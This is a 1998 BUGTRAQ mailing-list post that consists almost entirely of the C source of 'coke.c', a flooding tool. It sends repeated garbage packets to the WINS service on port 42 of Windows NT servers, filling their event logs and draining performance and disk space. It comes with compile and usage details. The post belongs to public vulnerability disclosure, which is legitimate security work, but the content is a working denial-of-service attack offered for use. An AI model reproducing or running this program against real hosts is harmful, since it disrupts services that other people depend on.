Everhart,Glenn From: snupe [snupe@SLACKWARE.ORG] Sent: Saturday, May 09, 1998 5:33 AM To: BUGTRAQ@NETSPACE.ORG Subject: coke.c /* coke.c */ /* coke +0.34 by crank and phuzz this little program exploits windowsnt servers 3.51/4.0 which are running wins (windows internet name service). depending on how the systems logging is configured it will create errors in the event logs, which will cause in a lack of the systems preformance, as well as available hard disk space. i've known about this exploit for sometime now, and thought everyone else did. but i never have seen anything for it. so here it is. coderight: you may use any code shown as long as credit is given. credit goes to: neonsurge who discovered this. justin marcus who also discovered this. tested on: slackware kernel 2.0.32 kernel 2.0.33 debian kernel 2.0.33 redhat kernel 2.1.95 compile: gcc -o coke coke.c */ #include #include #include #include #include #include #include #include /* defines */ #define GARBAGE "just a bunch of crap really does not matter" #define VERSION "+0.34" /* variables */ char *buf, *hn; int s, soc, con, i; int count, x; int twirl = 3; int countstr = 0; /* prototypes */ int twirly(int *twirl); void usage(char *argv[]); int main(int argc, char *argv[]); int sendPacket(char *buf, char *argv[]); /* structures */ struct sockaddr_in blah; struct hostent *hp; /* let the fun begin */ int main(int argc, char *argv[]) { if (argc < 3) { usage(argv); } /* create the garbage */ buf = (char *)malloc(10000); for (i = 0; i < 25; i++) strcat(buf, GARBAGE); strcat(buf, "\n"); printf("coke %s crank|phuzz\n\n",VERSION); sendPacket(buf,argv); for (x = 0; x <= count; x++) { sendPacket(buf,argv); /* just purdy stuff */ fprintf(stderr, "\rsending packet: %d (%c)", x, twirly(&twirl)); if (count <= 200) usleep(1500*(10)); else usleep(700*(10)); /* lets send the garbage to the server */ } fprintf(stderr, "\rsending packet: %d (caffine will kill you)",--x); printf("\n"); close(soc); /* free up our memory like good programmers */ free(buf); /* done so we wont reach the end of a non-void function */ exit(0); } int sendPacket(char *buf, char *argv[]) { hn = argv[1]; hp = gethostbyname(hn); /* number of packets to send */ count=(atoi(argv[2])); /* check target */ if (hp==NULL) { perror("coke: gethostbyname()"); exit(0); } bzero((char*)&blah, sizeof(blah)); bcopy(hp->h_addr, (char *)&blah.sin_addr, hp->h_length); blah.sin_family = hp->h_addrtype; blah.sin_port = htons(42); /* create a socket */ soc = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (!soc) { perror("coke: socket()"); close(soc); exit(1); } /* connect to target */ con = connect(soc, (struct sockaddr *)&blah, sizeof(blah)); if (!con) { perror("coke: connect()"); close(soc); exit(1); } sendto(soc, buf, strlen(buf),0 ,(struct sockaddr *)&blah, sizeof(struct sockaddr)); close(soc); return(0); } int twirly(int *twirl) { if (*twirl > 3) *twirl = 0; switch ((*twirl)++) { case 0: return('|'); break; case 1: return('/'); break; case 2: return('-'); break; case 3: return('\\'); break; } return(0); } /* for retards */ void usage(char *argv[]) { printf("coke %s crank|phuzz\n\nusage: %s \n",VERSION,argv[0]); exit(0); } /* EOF */